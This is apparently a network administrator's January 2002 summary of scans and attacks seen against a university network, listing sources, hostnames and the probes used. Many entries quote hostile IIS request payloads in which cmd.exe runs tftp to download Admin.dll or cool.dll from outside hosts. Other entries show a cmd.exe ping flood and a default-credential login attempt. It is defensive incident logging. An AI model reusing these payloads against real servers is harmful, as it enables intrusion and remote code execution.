Short summary of some of the attacks against us for Jan. 2002

time (EASTERN)  source_ip[:port]  (dns name, if any)  attack/scan/notes

2001/12/31-08:19:42.10 64.225.120.25 (workflowdata.com) scan net, 1 high number port per ip
2001/12/31-09:14:11.99 64.224.115.75 (mail.non-stop-movies.com) scan net, 1 high number port per ip
2002/01/01-07:49:44.39 209.142.8.2 () scan net, 1 high number port per machine all day long
2002/01/01-07:56:52.83 217.128.40.198 () scan net for port 21
2002/01/01-11:16:43.10 64.0.99.197 () scan net for port 33434
2002/01/01-15:15:50.49 193.252.223.99 () scan net for port 21
2002/01/02-05:41:39.24 24.251.138.48 (cx740158-a.elcjn1.sdca.home.com) portscan 132.235.2.184
2002/01/02-12:20:59.64 217.128.14.199 (AMarseille-203-1-2-199.abo.wanadoo.fr) scan net for port 21
2002/01/02-16:14:13.61 64.95.118.14 (h-64-95-118-14.epinions.com) send 1 packet to random high port on 132.235.15.56 6 times
2002/01/02-21:42:20.24 195.92.224.71 (castle-linux-03.whoc.theplanet.co.uk) scan net for port 22
2002/01/03-05:38:05.36 209.185.214.9 (WiseTec Web Solutions,Chino Hills, CA,US) scan net for port 22
2002/01/03-09:02:20.4 193.158.93.148 (Internet-TV,Stolberg,DE) scan net for port 111
2002/01/03-09:09:20.67 132.230.16.2 (tserv.iig.uni-freiburg.de) scan net for port 22
2002/01/03-10:53:28.15 193.180.245.36 (h193180245036.kommunicera.umea.se) scan net for port 27374
2002/01/03-10:59:37.04 193.158.93.148 (Internet-TV,Stolberg,DE) start of buff overflow attacks (rstatd)
2002/01/03-12:00:23.36 130.166.52.17 (asturias.csun.edu) scan net for port 21, anon ftp attacks
2002/01/03-13:35:31.46 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scan net for port 524
2002/01/03-17:39:48.31 217.228.237.236 (pD9E4EDEC.dip.t-dialin.net) scan net for port 21
2002/01/03-18:16:58.64 64.17.134.18 (Allied Riser Communications,Dallas, TX) IIS attack md.exe?/c+tftp%20-i%2010.60.188.60%20GET%20Admin.dll
2002/01/03-18:20:53.01 210.90.194.129 (korea crap) scan net for port 23
2002/01/03-19:47:15 65.94.227.150 (MTL-HSE-ppp201626.qc.sympatico.ca) scan net for port 80
2002/01/03-21:43:34.63 24.52.193.64 (oh-ashtabula2a-64.wre.adelphia.net) scan net for port 27374
2002/01/03-22:34:36.53 61.171.116.56 (CHINANET Shanghai province network,CN) IIS attack ..cmd.exe?/c+tftp%20-i%20132.147.101.112%20GET%20cool.dll
2002/01/04-00:18:24 207.54.149.179:1064 (as1-27.medina.apk.net)
2002/01/04-01:22:21 24.91.14.145 (h006008158dc8.ne.mediaone.net) scan net for port 22
2002/01/04-03:12:59.03 61.147.45.134 (Jiangsu province network,CN) try to use 132.235.1.70 as DNS for porno sites
2002/01/04-03:32:08.27 61.147.53.131 (Jiangsu province network,CN) try to ftp to 132.235.1.35
2002/01/04-09:04:39.80 210.51.193.3 (China Netcom Corp.,CN) conn to 132.235.1.35:21
2002/01/04-10:29:21.11 63.167.37.100 (host.transystems.com) portscan 132.235.1.1
2002/01/04-10:29:57.43 63.167.37.100 (host.transystems.com) portscan 132.235.1.2
2002/01/04-10:31:03.51 210.51.193.3 (China Netcom Corp.,CN) conn to 132.235.1.35:21
2002/01/04-12:45:00 212.187.98.98 (c98098.upc-c.chello.nl) scan net for port 80
2002/01/04-12:49:43.04 208.11.62.215 (port0341-cvx-carlton.cwjamaica.com) attack IIS on 132.235.18.111 w/ c+tftp%20-i%20132.146.160.89%20GET%20Admin.dll
2002/01/04-16:52:10.49 62.205.154.158 (Policom Spa,Fornacette (Pisa), Italy.) scan net for port 23
2002/01/05-05:44:11.99 61.144.141.83 (CHINANET Guangdong province network,CN) 1. IIS server attacks. Specifically, buff overflow with:
2002/01/05-05:44:11.99 61.144.141.83 (CHINANET Guangdong province network,CN) 2. cmd.exe?/c+tftp%20-i%20132.97.117.43%20GET%20cool.dll%20c:\httpodbc.dll
2002/01/05-05:48:13.75 172.188.28.159 (ACBC1C9F.ipt.aol.com) send 1 packet to random high port per ip all day
2002/01/05-06:44:49.37 216.162.102.200 (www.valuenet.net) send 1 packet to random high port per ip all day
2002/01/05-12:11:26.89 65.1.34.36 (ci60832-a.galatn1.tn.home.com) 1. attack IIS server on machines with buff overflow cmd:
2002/01/05-12:11:26.89 65.1.34.36 (ci60832-a.galatn1.tn.home.com) 2. tftp.exe/?+-i+129.2.17.114+GET\_tmp\_dmp\+2.tmp+c:/recycler/_/_tmp/2.tmp
2002/01/05-12:15:41.26 212.187.98.98 (c98098.upc-c.chello.nl) start ftp server installed by 65.1.34.36 and transfer files.
2002/01/05-19:41:29.12 65.94.227.194 (MTL-HSE-ppp201670.qc.sympatico.ca) scan net for port 21
2002/01/05-22:00:13.84 210.51.193.4 (China Netcom Corp.,CN) conn to 132.235.1.35:21
2002/01/06-06:03:27.63 24.114.62.27 (CPE0080c6e701d3.cpe.net.cable.rogers.com) scan net for port 27374
2002/01/06-06:05:22 202.41.10.20 (Jawharlal Nehru University,IN) scan net for port 22
2002/01/06-06:05:55.04 172.188.28.159 (ACBC1C9F.ipt.aol.com) send 1 packet to random high port, slow scan all day
2002/01/06-06:26:40.23 210.51.193.71 (China Netcom Corp.,CN) conn to 132.235.1.35:21
2002/01/06-06:56:03 61.33.90.126 (Media Plannet,PC Game Plaza User in SEOUL,KR) scan net for port 22
2002/01/06-08:50:13.91 210.51.193.67 (China Netcom Corp.,CN) conn to 132.235.1.35:21
2002/01/06-10:32:24.54 210.51.193.68 (China Netcom Corp.,CN) conn to 132.235.1.35:21
2002/01/06-11:47:19.72 65.1.34.36 (ci60832-a.galatn1.tn.home.com) 1. attack IIS server on machines with buff overflow cmd:
2002/01/06-11:47:19.72 65.1.34.36 (ci60832-a.galatn1.tn.home.com) 2. tftp.exe/?+-i+129.2.17.114+GET+acxro-test.tmp+c:/recycler/_/_tmp/2.tm
2002/01/06-13:59:50.96 216.98.64.248 (colo248.naxs.com) scan net for port 13000
2002/01/06-14:34:17.60 202.105.115.141 (CHINANET Guangdong province network,CN) send 1 packet to random high port, slow scan all day
2002/01/06-15:43:12.65 193.253.194.43 (AOrleans-101-1-2-43.abo.wanadoo.fr) scan net for port 21
2002/01/06-15:45:25.55 129.237.128.10 (titania.math.ukans.edu) send 1 packet to random high port, 10 machines
2002/01/06-16:39:50.00 144.214.160.204 (lotus4.cityu.edu.hk) send 1 packet to random high port, slow scan all day
2002/01/06-19:08:00.44 193.252.190.250 (AToulouse-201-1-4-250.abo.wanadoo.fr) ping scan of net
2002/01/06-19:08:03.38 193.252.190.250 (AToulouse-201-1-4-250.abo.wanadoo.fr) scan net for port 21
2002/01/06-23:49:56.54 61.155.161.108 (Ningbo Bird Sale CO., ltd JiangSu Branch,CN) conn to 132.235.1.35:21
2002/01/07-00:31:14.27 61.155.139.246 (Ningbo Bird Sale CO., ltd JiangSu Branch,CN) conn to 132.235.1.35:21
2002/01/07-00:54:57.07 61.155.170.20 (Ningbo Bird Sale CO., ltd JiangSu Branch,CN) conn to 132.235.1.35:21
2002/01/07-01:21:50.84 61.155.169.41 (Ningbo Bird Sale CO., ltd JiangSu Branch,CN) conn to 132.235.1.35:21
2002/01/07-01:58:44.92 80.11.172.234 (APuteaux-104-1-4-234.abo.wanadoo.fr) scan net for port 21
2002/01/07-05:51:02.76 61.177.61.242 (CHINANET Jiangsu province network,CN) 1. start scan/attacks of IIS servers with buff overflow
2002/01/07-05:51:02.76 61.177.61.242 (CHINANET Jiangsu province network,CN) 2. tftp%20-i%20132.232.9.18%20GET%20Admin.dll
2002/01/07-05:51:04.95 208.11.62.132 (port0258-cvx-carlton.cwjamaica.com) attack IIS w/ tftp%20-i%20132.146.160.89%20GET%20Admin.dll
2002/01/07-05:58:00.90 172.188.28.159 (ACBC1C9F.ipt.aol.com) send 1 packet to random high port, slow scan all day
2002/01/07-07:14:48.86 132.230.49.56:21 (webcam.vwl.uni-freiburg.de) scan net for port 21
2002/01/07-08:54:09 128.192.32.20 (dinky.fcs.uga.edu) scan net for port 22
2002/01/07-09:52:15.75 193.251.180.86 (AReims-101-1-1-86.abo.wanadoo.fr) scan net for port 21
2002/01/07-10:11:32.48 147.106.36.7:21 (bulldog.desales.edu) probe port 21 on dns servers.
2002/01/07-10:43:41.34 216.244.152.250 (mail.clinicasanborja.com.pe) scan net for port 21
2002/01/07-11:50:57.07 148.223.55.140 (customer-148-223-55-140.uninet.net.mx) scan net for port 21
2002/01/07-12:16:14.92 148.223.55.140 (customer-148-223-55-140.uninet.net.mx) use finger to probe 132.235.1.1 for '6' and '9'
2002/01/07-12:16:40.46 148.223.55.140 (customer-148-223-55-140.uninet.net.mx) try to login to 132.235.1.1 as nfsmgr/nfsmgr
2002/01/07-22:19:53.63 61.147.44.201 (CHINANET Jiangsu province network,CN) conn to 132.235.1.35:80
2002/01/08-01:13:27.39 61.143.63.87 (CHINANET Guangdong province network,CN) scan net for port 111 (rstatd)
2002/01/08-02:48:39.17 64.217.181.55 (adsl-64-217-181-55.dsl.lgvwtx.swbell.net) scan net for port 27374
2002/01/08-02:58:27.65 61.147.45.142 (CHINANET Jiangsu province network,CN) conn to 132.235.1.35:80
2002/01/08-03:06:53.50 61.147.45.142 (CHINANET Jiangsu province network,CN) conn to 132.235.1.35:80
2002/01/08-03:08:57.64 4.61.33.207 (lsanca1-ar23-4-61-033-207.vz.dsl.gtei.net) probe port 21 on selected machines.
2002/01/08-03:26:30.54 61.147.45.65 (CHINANET Jiangsu province network,CN) conn to 132.235.1.35:80
2002/01/08-04:07:02.91 61.143.63.87 (CHINANET Guangdong province network,CN) start of buff overflow attacks
2002/01/08-06:01:46.34 172.188.28.159 (ACBC1C9F.ipt.aol.com) send 1 packet to random high port, slow scan all day
2002/01/08-08:22:17 132.235.90.7:1031 (O.U) scan net for port 38293 UDP
2002/01/08-08:40:22 217.128.61.146 (ALille-204-1-1-146.abo.wanadoo.fr) SYN scan net for port 21
2002/01/08-11:08:43.90 64.23.60.41 (ns1.newmeco.net) scan net for port 21
2002/01/08-16:03:15.28 203.199.240.200 (Videsh Sanchar Nigam Ltd - India) conn to 132.235.17.1 ports 23, 20, 23 (login guest), 230, 80, 45
2002/01/08-16:50:09.78 80.8.16.234 (ca-ol-angers-9-234.abo.wanadoo.fr) 1. attack IIS server with buff overflow with:
2002/01/08-16:50:09.78 80.8.16.234 (ca-ol-angers-9-234.abo.wanadoo.fr) 2. tftp%20-i%20132.100.100.100%20GET%20Admin.dll
2002/01/08-18:43:54.42 80.13.220.152 (AMontpellier-201-1-6-152.abo.wanadoo.fr) SYN scan of net for port 80
2002/01/09-02:24:00.26 172.190.180.40 (ACBEB428.ipt.aol.com) scan net for port 21, anon ftp scan
2002/01/09-06:03:59.45 172.188.28.159 (ACBC1C9F.ipt.aol.com) send 1 packet to random high port per ip all day
2002/01/09-06:52:24.23 61.147.45.7 (CHINANET Jiangsu province network) conn to 132.235.1.35:80
2002/01/09-08:27:56 172.184.229.78 (ACB8E54E.ipt.aol.com) SYN scan net for port 21
2002/01/09-08:30:30.68 172.184.229.78 (ACB8E54E.ipt.aol.com) scan net for port 21
2002/01/09-09:12:28 217.128.61.146 (ALille-204-1-1-146.abo.wanadoo.fr) SYN scan of net for port 21
2002/01/09-09:39:52.06 216.136.75.126 (mailclt.webserve.net) 1. attack IIS w/ c+copy+c:\winnt\system32\cmd.exe+D:\InetPub\scripts\sensepost.exe
2002/01/09-09:39:52.06 216.136.75.126 (mailclt.webserve.net) 2. FTP to 205.252.89.206 for pgms
2002/01/09-10:13:42.19 148.240.168.62 (dial-148-240-168-62.zone-2.dial.net.mx) scan net for port 21
2002/01/09-10:45:28.01 200.11.182.36 (TRUE, The Real Unix Experts,CARACAS,VA) attack IIS tftp%20-i%20132.147.16.150%20GET%20Admin.dll
2002/01/09-21:44:42.88 61.147.44.194 (CHINANET Jiangsu province network) conn to 132.235.1.35:80
2002/01/09-13:47:12 194.149.242.3:22 (web.creanet.com) scan net for port 22
2002/01/09-15:50:21 132.235.238.1:1056 (admin.memaud.ohiou.edu) scan net for port 38293
2002/01/09-16:17:48 132.235.90.7:1031 (OUCOM - ohiou.edu) scan net for port 38293
2002/01/09-22:17:34.37 24.80.254.213 (h24-80-254-213.vc.shawcable.net) probe ports 445 139 137 on 132.235.201.31
2002/01/09-23:05:46.41 203.69.237.32 (CHTD, Chunghwa Telecom Co.,Ltd.,TW) attack IIS c+tftp%20-i%20132.32.1.77%20GET%20cool.dll
2002/01/10-00:47:39.99 61.147.45.4 (CHINANET Jiangsu province network) conn to 132.235.1.35:21
2002/01/10-01:53:02.84 61.147.44.210 (CHINANET Jiangsu province network) conn to 132.235.1.35:80
2002/01/10-02:46:47.60 61.149.27.252 (CHINANET Jiangsu province network) conn to 132.235.1.40:80
2002/01/10-03:13:53.97 61.132.13.99 (CHINANET Jiangsu province network) conn to 132.235.1.35:21
2002/01/10-03:40:47.33 61.147.45.203 (CHINANET Jiangsu province network) conn to 132.235.1.35:80
2002/01/10-04:41:12.17 61.147.59.75 (CHINANET Jiangsu province network) conn to 132.235.1.35:80
2002/01/10-04:57:24.41 130.161.249.59:22 (Technische Universiteit Delft,NE) scan net for port 22
2002/01/10-05:14:24.04 193.252.190.250 (AToulouse-201-1-4-250.abo.wanadoo.fr) probe multiple ips for anon-ftp
2002/01/10-09:02:02 217.57.19.30:8080 (CDC COMPUTER DATA CONTROL,IT) scan net for port 8080
2002/01/10-11:16:00.57 61.177.61.242 (CHINANET Jiangsu province network,CN) 1. attack IIS server with buff overflow cmd
2002/01/10-11:16:00.57 61.177.61.242 (CHINANET Jiangsu province network,CN) 2. tftp%20-i%20132.232.9.18%20GET%20Admin.dll
2002/01/10-12:43:48 216.200.130.203 (ezspider303.directhit.com) slow SYN scan of net for port 80
2002/01/10-15:28:18 207.173.145.70 (Wasatch Hosting,US) SYN scan of net for port 25
2002/01/10-18:38:34.27 61.11.57.127 (DISHNETDSL Limited,IN) 1. attack IIS server with buff overflow cmd
2002/01/10-18:38:34.27 61.11.57.127 (DISHNETDSL Limited,IN) 2. tftp%20-i%20132.135.10.101%20GET%20Admin.dll%20d:\Admin.dll
2002/01/10-21:07:25 212.246.27.66:22 (mail.ppct.fi) scan net for port 22
2002/01/10-23:35:12.75 132.235.162.199 (dhcp-162-199.east-green.ohiou.edu) scan net for port 23
2002/01/11-00:18:37.66 132.235.162.199 (dhcp-162-199.east-green.ohiou.edu) scan net for port 23 again
2002/01/11-02:46:08.07 61.147.45.139 (CHINANET Jiangsu province network,CN) probe port 53 on 132.235.1.70
2002/01/11-03:09:19.34 132.235.162.199 (dhcp-162-199.east-green.ohiou.edu) scan net for port 23 again
2002/01/11-04:07:10.34 32.235.162.199 (dhcp-162-199.east-green.ohiou.edu) scan net for ports 21,22,23,24,25
2002/01/11-05:20:41 216.78.95.188 (host-216-78-95-188.jax.bellsouth.net) scan net for port 25
2002/01/11-05:48:57.07 132.235.162.199 (dhcp-162-199.east-green.ohiou.edu) scan net for ports 21,22,23,24,25,137
2002/01/11-08:37:00.09 61.75.93.141 (korea crap) scan ports 445 139 137 on 132.235.201.31
2002/01/11-08:43:45 212.246.27.66 (mail.ppct.fi) scan net for port 22
2002/01/11-10:03:39.86 61.156.20.85 (CHINANET Shandong province network,CN) scan net for ports 3072 12760 1024
2002/01/11-16:59:32 143.225.169.36 (CRIAI,NAPOLI,IT) scan net for port 22
2002/01/11-19:06:27.35 202.183.234.203 (Shinawatra Telewiz Co., Ltd.,TH) scan 132.235.17.17 for ports 21,22,23,512,1024
2002/01/11-19:27:05.28 129.7.235.5 (Creek.UH.EDU) scan multiple ips, 1 packet to high number port per machine
2002/01/11-22:43:23.81 202.188.104.2 (KOP (M) Sdn. Bhd. (KUALA LUMPUR),MY) portscan 132.235.17.17
2002/01/11-22:59:37.87 204.182.51.41 (COMET WAY INC.,Penn,USA) scan net for port 515
2002/01/12-01:19:48.85 143.169.159.4 (wwwuza.uia.ac.be) scan net for port 21
2002/01/12-04:21:40 208.242.37.131 (Sandpiper Networks,CA,US) scan net for port 22
2002/01/12-05:09:19.62 211.138.203.66 (China Mobile Communications Corporation,CN) scan net for port 111 - rstatd attack
2002/01/12-06:27:39.77 212.10.223.198 (pc46198.stofanet.dk) scan net for port 21
2002/01/12-07:37:13.26 80.11.200.182 (ABoulogne-103-1-6-182.abo.wanadoo.fr) scan net for port 21
2002/01/12-08:07:27.52 61.147.45.206 (CHINANET Jiangsu province network,CN) probe port 21 on 132.235.1.35
2002/01/12-19:16:21 64.244.109.154 (adsla154.cofs.net) scan net for port 22
2002/01/12-20:36:11.46 4.3.253.182 (GENUITY,MA,US) scan net for port 111
2002/01/13-05:56:13.15 172.141.121.192 (AC8D79C0.ipt.aol.com) send 1 packet to random high port per ip all day
2002/01/13-05:56:13.15 172.141.121.192 (AC8D79C0.ipt.aol.com) send 1 packet to random high port per ip for rest of day
2002/01/13-06:08:40.19 172.188.28.159 (ACBC1C9F.ipt.aol.com) send 1 packet to random high port per ip for rest of day
2002/01/13-06:08:40.19 172.188.28.159 (pointer ACBC1C9F.ipt.aol.com) send 1 packet to random high port per ip all day
2002/01/13-06:39:22.96 207.45.201.78 (Teleglobe Inc.,VA,US) send 1 packet to random high port per ip for rest of day
2002/01/13-07:24:21.29 213.233.101.154 (101dial154.xnet.ro) send 1 packet to random high port per ip for rest of day
2002/01/13-07:37:52.35 24.116.172.160 (172-160.boicpe.cableone.net) scan net for port 21
2002/01/13-07:38:11.21 24.116.172.160 (172-160.boicpe.cableone.net) scan net for port 21
2002/01/13-08:38:33.38 213.248.106.199 (Blizzard Entertainment,SE) send 1 packet to random high port per ip for rest of day
2002/01/13-10:27:28.54 209.221.176.2 (gorecki.5stops.com) send 1 packet to random high port per ip for rest of day
2002/01/13-12:24:25.86 132.248.252.14 (Universidad Nacional Autonoma de Mexico,MX) 1. attack IIS servers with buff overflow cmd
2002/01/13-12:24:25.86 132.248.252.14 (Universidad Nacional Autonoma de Mexico,MX) 2. tftp%20-i%20132.248.252.14%20GET%20cool.dll
2002/01/13-12:24:57.71 132.248.252.14 (Universidad Nacional Autonoma de Mexico,MX) 1. attack IIS server w/buff overflow w/command
2002/01/13-12:24:57.71 132.248.252.14 (Universidad Nacional Autonoma de Mexico,MX) 2. tftp%20-i%20132.248.252.14%20GET%20cool.dll%20d:\httpodbc.dll
2002/01/13-12:52:53.13 213.233.106.54 (106dial54.xnet.ro) send 1 packet to random high port per ip - 5 ips
2002/01/13-14:08:08.15 80.135.94.188 (p50875EBC.dip.t-dialin.net) scan net for port 80
2002/01/13-15:21:26.13 65.84.249.101 (non-stop-movies.com) send 1 packet to random high port per ip for rest of day
2002/01/13-21:35:15.76 128.146.54.107 (slb202.oardc.ohio-state.edu) send 1 packet to random high port per ip for rest of day
2002/01/13-23:21:09.61 80.56.144.47 (f144047.upc-f.chello.nl) scan net for port 21
2002/01/13-23:36:41 64.232.202.4 (ns1.starlink.com) scan net for port 22
2002/01/13-23:37:06.53 64.224.115.75 (mail.non-stop-movies.com) send 1 packet to random high port per ip for rest of day
2002/01/14-05:59:26 66.149.34.37 (user-119a8h5.biz.mindspring.com) scan net for port 515
2002/01/14-05:59:26.80 66.149.34.37 (user-119a8h5.biz.mindspring.com) scan net for port 515
2002/01/14-15:54:00.11 24.10.166.23 (cx1180476-b.vbch1.va.home.com) scan net for port 21
2002/01/14-18:45:26.29 61.147.53.130 (CHINANET Jiangsu province network) pound on 132.235.1.35:21 5x/min, till 2002/01/14-19:09:21.48
2002/01/14-23:08:24.24 61.147.52.74 (CHINANET Jiangsu province network) pound on 132.235.1.35:21 5x/min, till 2002/01/15-00:43:47.31
2002/01/15-00:27:19.82 216.232.46.223 (s216-232-46-223.bc.hsia.telus.net) scan net for port 515
2002/01/15-05:52:01.69 61.147.53.83 (CHINANET Jiangsu province network) pound on 132.235.1.35:21 5x/min, till 2002/01/15-05:57:33.16
2002/01/15-09:23:22.13 62.219.204.163 (bzq-204-163.lns.bezeqint.net) scan net for port 80
2002/01/15-22:58:09.46 209.81.166.154 (d153.as1.clev.oh.voyager.net) >60 packets to 132.235.1.2:0
2002/01/15-23:02:43.82 216.232.46.223 (s216-232-46-223.bc.hsia.telus.net) scan&probe net for port 515
2002/01/15-23:24:08.22 61.147.52.67 (CHINANET Jiangsu province network) pound on 132.235.1.35:21 5x/min, till 2002/01/15-06:04:56.04
2002/01/16-06:27:02.01 61.147.52.136 (CHINANET Jiangsu province network) pound on 132.235.1.35:21
2002/01/16-06:32:31.57 61.147.52.200 (CHINANET Jiangsu province network) pound on 132.235.1.35:21
2002/01/16-07:39:40.10 132.68.215.99 (nt.bosmat.technion.ac.il) start of scan of net for port 80
2002/01/16-08:49:36.35 132.235.162.133 (dhcp-162-133.east-green.ohiou.edu) portscan 132.235.1.11 (arachits)
2002/01/16-10:15:16.08 132.235.162.133 (dhcp-162-133.east-green.ohiou.edu) scan net repeatedly for port 80 (arachits)
2002/01/16-11:30:03.90 62.211.25.39 (Telecom Italia Net,IT) scan net for port 111 - rstatd
2002/01/16-16:25:36.92 216.167.77.167 (Verio, Inc.,CA,US) scan net for port 6112
2002/01/16-17:59:23.51 132.248.252.14 (Universidad Nacional Autonoma de Mexico,MX) 1. attack IIS server w/buff overflow with
2002/01/16-17:59:23.51 132.248.252.14 (Universidad Nacional Autonoma de Mexico,MX) 2. c+tftp%20-i%20132.248.252.14%20GET%20cool.dll%20c:\httpodbc.dll
2002/01/16-18:24:39.97 62.211.25.39 (Telecom Italia Net,IT) scan net for port 111 - rstatd
2002/01/16-18:33:53.06 61.147.53.66 (CHINANET Jiangsu province network) pound on 132.235.1.35:21
2002/01/16-19:00:43.05 213.187.175.49 (213-187-175-49.dd.nextgentel.com) scan net for port 21
2002/01/16-19:34:06.57 213.187.175.49 (213-187-175-49.dd.nextgentel.com) scan net for ports 1080,8080
2002/01/16-21:00:28.70 132.68.215.99 (nt.bosmat.technion.ac.il) 1. start of attack IIS server w/buff overflow with
2002/01/16-21:00:28.70 132.68.215.99 (nt.bosmat.technion.ac.il) 2. tftp%20-i%20132.68.215.99%20GET%20cool.dll%20d:\httpodbc.dll
2002/01/16-22:12:21.12 200.247.113.224 (nfns02-1224.fns.embratel.net.br) 1. attack multiple ips via port 515 with std.script
2002/01/16-22:12:21.12 200.247.113.224 (nfns02-1224.fns.embratel.net.br) 2. see < http://ace.cs.ohiou.edu/~tysko/script.2002.1.17 >
2002/01/16-22:50:14.18 61.147.53.140 (CHINANET Jiangsu province network) pound on 132.235.1.35:21
2002/01/17-01:09:30.31 80.136.74.61 (p50884A3D.dip.t-dialin.net) scan net for ports 80,1433
2002/01/17-01:10:38.85 193.252.177.47 (AMarseille-101-1-1-47.abo.wanadoo.fr) scan net for port 21
2002/01/17-06:04:13.51 172.188.28.159 (ACBC1C9F.ipt.aol.com) scan net, 1 pkt to random high number port
2002/01/17-06:31:40.66 61.147.52.73 (CHINANET Jiangsu province network) pound on 132.235.1.35:21
2002/01/17-07:26:54.98 205.252.46.98 (babble-on.systems.cais.net) scan several ips, 1 pkt to random high number port
2002/01/17-07:44:38.04 217.58.11.194 (MATICAD SRL,IT) scan net for port 21
2002/01/17-07:44:43.31 217.58.11.194 (MATICAD SRL,IT) start of anon ftp attacks of machines from prev. scan
2002/01/17-08:20:05.44 172.189.114.190 (ACBD72BE.ipt.aol.com) scan net for port 21, anon ftp attacks
2002/01/17-12:34:37.05 131.211.67.101 (knagserver.geog.uu.nl) SYN scan net for port 80
2002/01/17-13:00:13.45 156.63.190.58 (lpdc.medina-esc.k12.oh.us) scan net for port 21
2002/01/17-13:12:39 131.211.67.10 (maren.geog.uu.nl) SYN scan of net on port 80
2002/01/17-14:33:19.84 208.27.68.230 (NEXTEK DESIGNS/CONAP,NEWERK,OH,US) scan several ips, 1 pkt to random high number port
2002/01/17-15:36:16.93 199.45.141.1 (frontier.net) scan several ips, 1 pkt to random high number port
2002/01/17-17:39:51.95 80.11.33.169 (AReims-101-1-5-169.abo.wanadoo.fr) probe anon ftp on several ips
2002/01/17-18:50:46.78 61.147.52.65 (CHINANET Jiangsu province network) pound on 132.235.1.35:21
2002/01/17-19:50:09.15 193.251.13.170 (ANeuilly-101-1-2-170.abo.wanadoo.fr) scan net for port 80
2002/01/17-19:51:20.64 193.251.13.170 (ANeuilly-101-1-2-170.abo.wanadoo.fr) scan net for port 80, probe scriptalias access
2002/01/17-20:36:07.11 61.177.251.95 (CHINANET Jiangsu province network,CN) tries to connect to 132.235.1.35:80
2002/01/17-20:57:26.60 61.132.13.120 (CHINANET Jiangsu province network,CN) >100 tries to connect to 132.235.1.35:80
2002/01/17-21:26:11.13 216.122.94.9 (nat-94-9.nameserve.net) scan several ips, 1 pkt to random high number port
2002/01/17-22:47:00.63 216.122.94.8 (nat-94-8.nameserve.net) scan several ips, 1 pkt to random high number port
2002/01/17-23:18:31 24.126.144.76 (we-24-126-144-76.we.mediaone.net) SYN scan of net on port 80
2002/01/18-00:38:49 24.76.217.223:137 (h24-76-217-223.va.shawcable.net) scan net for port 137
2002/01/18-01:36:17.61 132.234.76.142 (sb-staf-76-142.qcas.gu.edu.au) scan net for port 3283
2002/01/18-03:11:53.76 61.177.61.242 (CHINANET Jiangsu province network,CN) tries to connect to 132.235.1.35:80
2002/01/18-04:40:12.47 193.253.247.239 (APlessis-Bouchard-101-1-2-239.abo.wanadoo.fr) scan net for port 21
2002/01/18-04:40:19.07 193.253.247.239 (APlessis-Bouchard-101-1-2-239.abo.wanadoo.fr) scan net for port 21
2002/01/18-04:58:36.69 4.61.33.207 (lsanca1-ar23-4-61-033-207.vz.dsl.gtei.net) probe port 21 on selected machines.
2002/01/18-07:28:05.56 212.50.160.21 (Kingston Communications Limited,GB) scan several ips, 1 pkt to random high number port
2002/01/18-10:20:21 130.226.209.32 (Danish Network for Research and Education) scan net for port 22
2002/01/18-11:43:11.20 65.204.135.199 (Flexible Web Service,CA,US) scan net for port 111
2002/01/18-13:59:14.68 24.157.67.181 (CPE0050bae7eeb4.cpe.net.cable.rogers.com) portscan net for ports 21,22,23,24...54
2002/01/18-17:25:55.35 131.211.67.101 (knagserver.geog.uu.nl) 1. try to exec cmd on pc w/IIS with buff overflow as:
2002/01/18-17:25:55.35 131.211.67.101 (knagserver.geog.uu.nl) 2. cmd.exe?/c+ping+-v+udp+-n+2000+-l+62000+-w+0+62.226.81.63 HTTP/1.1
2002/01/18-21:08:23 209.239.136.160 (d159.as0.athn.oh.voyager.net) scan net for port 48563
2002/01/19-00:34:12.73 68.34.238.15 (pcp669708pcs.indpnd01.mo.comcast.net) scan net for port 27374
2002/01/19-03:21:51.52 61.177.24.232 (CHINANET Jiangsu province network,CN) 1. attack pc w/IIS server with command:
2002/01/19-03:21:51.52 61.177.24.232 (CHINANET Jiangsu province network,CN) 2. c+tftp%20-i%20132.232.67.218%20GET%20Admin.dll%20d:\Admin.dll
2002/01/19-07:49:36.88 172.188.28.159 (ACBC1C9F.ipt.aol.com) scan several ips, 1 pkt to random high number port all day long
2002/01/19-08:21:01.66 65.198.68.56 (netmapper.research.lumeta.com) scan net for port 33435
2002/01/19-10:22:41 213.51.203.171 (cc139034-c.ensch1.ov.nl.home.com) scan net for port 80
2002/01/19-11:11:54.32 132.68.215.99 (nt.bosmat.technion.ac.il) 1. attack pc w/IIS server with command:
2002/01/19-11:11:54.32 132.68.215.99 (nt.bosmat.technion.ac.il) 2. tftp%20-i%20132.68.215.99%20GET%20cool.dll%20c\httpodbc.dll
2002/01/19-11:27:44.53 65.174.51.166 (KORKSOFT,FL,US) scan several ips, 1 pkt to random high number port
2002/01/19-13:25:37 211.58.254.12 (korea crap) scan net for port 22
2002/01/19-14:55:21.45 209.242.64.97 (freemail.vines.net) scan several ips, 1 pkt to random high number port, all day long
2002/01/19-18:44:35.39 193.152.162.145 (193-152-162-145.uc.nombres.ttd.es) scan net for port 21
2002/01/19-20:53:06 200.206.157.120 (200-206-157-120.dsl.telesp.net.br) scan net for port 22
2002/01/19-20:58:22.56 148.221.115.67 (du-148-221-115-67.prodigy.net.mx) scan net for port 12345
2002/01/19-20:58:23 148.221.115.67 (du-148-221-115-67.prodigy.net.mx) scan net for port 12345
2002/01/19-22:14:55.75 216.40.214.203 (mail.bigtimee.com) scan several ips, 1 pkt to random high number port
2002/01/20-03:22:56 217.0.79.159 (pD9004F9F.dip.t-dialin.net) scan net for port 80
2002/01/20-05:56:57.99 209.242.64.97 (freemail.vines.net) scan several ips, 1 pkt to random high number port
2002/01/20-06:00:51.78 216.40.214.203 (mail.bigtimee.com) scan several ips, 1 pkt to random high number port
2002/01/20-06:35:52 80.13.220.143 (AMontpellier-201-1-6-143.abo.wanadoo.fr) scan net for port 80
2002/01/20-06:53:20.91 172.188.28.159 (ACBC1C9F.ipt.aol.com) scan several ips, 1 pkt to random high number port all day long
2002/01/20-07:46:32.22 61.147.45.80 (CHINANET Jiangsu province network) try to use 132.235.1.70 as dns server
2002/01/20-07:54:15.58 65.198.68.56 (netmapper.research.lumeta.com) scan net for port 33435
2002/01/20-11:33:06.35 24.93.183.6 (a1-3d006.neo.rr.com) scan net for port 21
2002/01/20-13:37:30.82 148.221.116.159 (du-148-221-116-159.prodigy.net.mx) scan net for port 12345
2002/01/20-13:44:34.23 62.211.188.18 (Telecom Italia Net,IT) scan net for port 111 - rstatd
2002/01/20-13:50:40.37 194.67.57.35 (f5.mail.ru) scan several ips, 1 pkt to random high number port
2002/01/20-16:24:11.78 217.128.45.211 (ABoulogne-103-1-4-211.abo.wanadoo.fr) scan net for port 21
2002/01/20-16:45:57.90 64.214.30.92 (irc.east.gblx.net) scan several ips, 1 pkt to random high number port, all day long
